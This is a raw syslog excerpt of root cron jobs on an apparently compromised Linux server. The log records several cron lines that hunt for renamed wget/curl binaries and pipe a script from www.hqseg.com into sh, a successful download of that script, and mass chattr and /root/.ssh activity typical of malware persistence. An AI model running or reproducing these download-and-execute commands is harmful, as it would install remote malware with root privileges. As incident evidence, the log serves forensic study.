Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/cc)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/certbot)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/dnsdomainname)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/domainname)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/ex)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/futurize)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/futurize-2)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/futurize-2.7)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/geqn)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gmake)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gneqn)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gnroff)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gpg)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gpgv)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gpic)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gsoelim)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gtar)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gtbl)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gtroff)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/i386)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/infotocap)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/iptables-xml)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/lastb)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/ld)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/letsencrypt)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/linux32)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/linux64)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/lz4cat)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/nisdomainname)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/open)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/pasteurize)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/pasteurize-2)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/pasteurize-2.7)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/php56)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/php56-cgi)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/php56-pear)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/php56-phar)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/ping6)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/psfaddtable)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/psfgettable)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/psfstriptable)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/python)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/python2)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/reset)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/rpmquery)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/rpmverify)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/rvi)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/rview)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/scsi-rescan)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/setup-nsssysinit)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/sg)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/sh)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/slogin)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/sudoedit)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/systemd-coredumpctl)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/systemd-loginctl)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/tclsh)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/unlz4)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/unxz)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/view)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/x86_64)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/xzcat)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/xzcmp)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/xzegrep)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/xzfgrep)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/ypdomainname)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/zsoelim)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (mv: ‘/bin/chattr’ and ‘/bin/chattr’ are the same file)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Not a directory while trying to stat /etc/crontab/)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/favicon.png)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/grub2.cfg)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/grub.conf)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/init.d)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/localtime)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/mtab)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc0.d)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc1.d)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc2.d)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc3.d)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc4.d)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc5.d)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc6.d)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc.local)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/redhat-release)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/system-release)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (mv: ‘/bin/chmod’ and ‘/bin/chmod’ are the same file)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (mkdir: cannot create directory ‘/root/.ssh’: File exists)
Apr 1 14:20:01 host-name crond[1006]: (CRON) bad minute (/etc/cron.d/root)
Apr 1 14:20:01 host-name crond[1006]: (CRON) bad minute (/etc/cron.d/root)
Apr 1 14:20:01 host-name crond[1006]: (CRON) bad minute (/etc/cron.d/root)
Apr 1 14:20:01 host-name CROND[25587]: (root) CMD (for f in /bin/*;do strings $f|grep -q wget@&&break;done;$f q -O- http://www.hqseg.com/ini.sh | sh)
Apr 1 14:20:01 host-name CROND[25589]: (root) CMD (for f in /bin/*;do strings $f|grep -q curl.debug&&break;done;$f -fsSL http://www.hqseg.com/ini.sh | sh)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/apropos)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/audit2why)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/awk)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/bashbug)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/captoinfo)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/cc)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/certbot)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/dnsdomainname)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/domainname)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/ex)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/futurize)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/futurize-2)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/futurize-2.7)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/geqn)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gmake)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gneqn)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gnroff)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gpg)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gpgv)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gpic)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gsoelim)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gtar)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gtbl)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gtroff)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/i386)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/infotocap)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/iptables-xml)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/lastb)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/ld)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/letsencrypt)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/linux32)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/linux64)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/lz4cat)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/nisdomainname)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/open)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/pasteurize)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/pasteurize-2)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/pasteurize-2.7)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/php56)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/php56-cgi)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/php56-pear)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/php56-phar)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/ping6)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/psfaddtable)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/psfgettable)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/psfstriptable)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/python)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/python2)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/reset)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/rpmquery)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/rpmverify)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/rvi)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/rview)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/scsi-rescan)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/setup-nsssysinit)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/sg)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/sh)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/slogin)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/sudoedit)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/systemd-coredumpctl)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/systemd-loginctl)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/tclsh)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/unlz4)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/unxz)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/view)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/x86_64)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/xzcat)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/xzcmp)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/xzegrep)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/xzfgrep)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/ypdomainname)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/zsoelim)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (mv: ‘/bin/chattr’ and ‘/bin/chattr’ are the same file)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Not a directory while trying to stat /etc/crontab/)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/favicon.png)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/grub2.cfg)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/grub.conf)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/init.d)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/localtime)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/mtab)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc0.d)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc1.d)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc2.d)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc3.d)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc4.d)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc5.d)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc6.d)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc.local)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/redhat-release)
Apr 1 14:20:04 host-name CROND[25584]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/system-release)
Apr 1 14:20:05 host-name CROND[25584]: (root) CMDOUT (mv: ‘/bin/chmod’ and ‘/bin/chmod’ are the same file)
Apr 1 14:20:05 host-name CROND[25584]: (root) CMDOUT (mkdir: cannot create directory ‘/root/.ssh’: File exists)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (--2020-04-01 14:20:09-- http://q/)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (Resolving q (q)... failed: Name or service not known.)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (wget: unable to resolve host address ‘q’)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (--2020-04-01 14:20:09-- http://www.hqseg.com/ini.sh)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (Resolving www.hqseg.com (www.hqseg.com)... 206.189.65.149)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (Connecting to www.hqseg.com (www.hqseg.com)|206.189.65.149|:80... connected.)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (HTTP request sent, awaiting response... 301 Moved Permanently)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (Location: https://www.hqseg.com/ini.sh [following])
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (--2020-04-01 14:20:09-- https://www.hqseg.com/ini.sh)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (Connecting to www.hqseg.com (www.hqseg.com)|206.189.65.149|:443... connected.)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (HTTP request sent, awaiting response... 200 OK)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (Length: 1493 (1.5K) [application/octet-stream])
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (Saving to: ‘STDOUT’)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT ()
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT ( 0K . 100% 228M=0s)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT ()
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (2020-04-01 14:20:09 (228 MB/s) - written to stdout [1493/1493])
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT ()
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (FINISHED --2020-04-01 14:20:09--)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (Total wall clock time: 0.04s)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (Downloaded: 1 files, 1.5K in 0s (228 MB/s))
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/apropos)
Apr 1 14:20:09 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/audit2why)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/awk)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/bashbug)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/captoinfo)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/cc)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/certbot)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/dnsdomainname)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/domainname)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/ex)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/futurize)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/futurize-2)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/futurize-2.7)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/geqn)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gmake)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gneqn)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gnroff)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gpg)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gpgv)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gpic)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gsoelim)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gtar)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gtbl)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/gtroff)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/i386)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/infotocap)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/iptables-xml)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/lastb)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/ld)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/letsencrypt)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/linux32)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/linux64)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/lz4cat)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/nisdomainname)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/open)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/pasteurize)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/pasteurize-2)
